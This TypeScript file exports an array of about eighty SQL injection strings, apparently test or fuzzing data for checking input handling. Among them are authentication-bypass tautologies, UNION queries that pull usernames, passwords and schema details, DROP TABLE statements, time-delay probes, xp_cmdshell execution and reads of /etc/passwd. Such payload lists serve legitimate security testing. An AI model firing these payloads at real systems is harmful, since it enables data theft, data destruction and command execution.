export const sqlData: string[] = [
    'select * from "Jahia"."Users" order by "ID"',
    '1;DROP TABLE users',
    '1\'; DROP TABLE users-- 1',
    '\' OR 1=1 -- 1',
    '\' OR \'1\'=\'1',
    '\' OR \'1\'=\'1\' --',
    '\' OR \'1\'=\'1\' /*',
    'admin\' --',
    '\' UNION SELECT NULL--',
    '1\'; DROP TABLE users--',
    '\' or 1=1--',
    '" or 1=1--',
    'or 1=1--',
    '\' or \'x\'=\'x',
    '" or "x"="x',
    '\') or (\'x\'=\'x',
    '\' or 1=1#',
    '" or 1=1#',
    'or 1=1#',
    '\' OR \'1',
    '\' OR 1 -- -',
    '" OR "" = "',
    '" OR 1 = 1 -- -',
    '\' OR \'\' = \'',
    '\'=\'',
    '\'LIKE\'',
    '\'=0--+',
    ' OR 1=1',
    '\' OR \'x\'=\'x',
    '\' AND id IS NULL; --',
    '\'\'\'\'\'\'\'\'\'\'\'\'\'UNION SELECT \'2',
    '%00',
    '/*…*/ UNION SELECT/*…*/',
    '+UNION+SELECT+',
    '+ UNION+SELECT+',
    '+UNION+ALL+SELECT+',
    '||6',
    '\'||\'6',
    '(||6)',
    '\' OR 1=1--',
    'OR 1=1',
    '\' OR \'1\'=\'1',
    'OR \'1\'=\'1\'',
    '\' OR 1=1 or \'\'=\'',
    '" OR 1=1 or ""="',
    '1\' UNION SELECT NULL, NULL--',
    '1\' UNION ALL SELECT NULL, NULL--',
    '\' UNION SELECT NULL, username, password FROM users--',
    '\' UNION SELECT NULL, table_name FROM information_schema.tables--',
    '\' UNION SELECT NULL, column_name FROM information_schema.columns--',
    'admin\'--',
    'admin\' #',
    'admin\'/*',
    '\' or 1=1 limit 1 --',
    '\'="',
    '\' AND 1=0 UNION ALL SELECT \'\', \'81dc9bdb52d04dc20036dbd8313ed055',
    '" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055',
    '\' UNION SELECT NULL, \'admin\', \'5f4dcc3b5aa765d61d8327deb882cf99',
    '\'; EXEC xp_cmdshell(\'dir\') --',
    '\'; EXEC sp_configure \'show advanced options\', 1 --',
    '\'; DROP TABLE users; --',
    '\'; WAITFOR DELAY \'00:00:05\' --',
    '\' AND 1=CONVERT(int, (SELECT @@version)) --',
    '\' UNION SELECT NULL, NULL, NULL, @@version --',
    '\' AND 1=2 UNION SELECT NULL, load_file(\'/etc/passwd\') --',
    '\' INTO OUTFILE \'/tmp/out.txt',
    '\'; SELECT * FROM information_schema.tables --',
    '\' AND extractvalue(1,concat(0x7e,database())) --',
    '\' AND updatexml(1,concat(0x7e,version()),1) --',
    '\' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --',
    '\' UNION SELECT NULL, group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() --',
    '\' UNION SELECT NULL, group_concat(column_name) FROM information_schema.columns WHERE table_name=\'users\' --',
    '\' UNION SELECT username, password FROM users WHERE \'1\'=\'1',
    '1\' AND 1=2 UNION SELECT NULL, database() --',
    '1\' AND 1=2 UNION SELECT NULL, user() --',
    '\'; EXECUTE IMMEDIATE \'SELECT * FROM dual\' --',
    '\' OR 1=1; BEGIN EXECUTE IMMEDIATE \'SELECT banner FROM v$version\'; END; --'
];
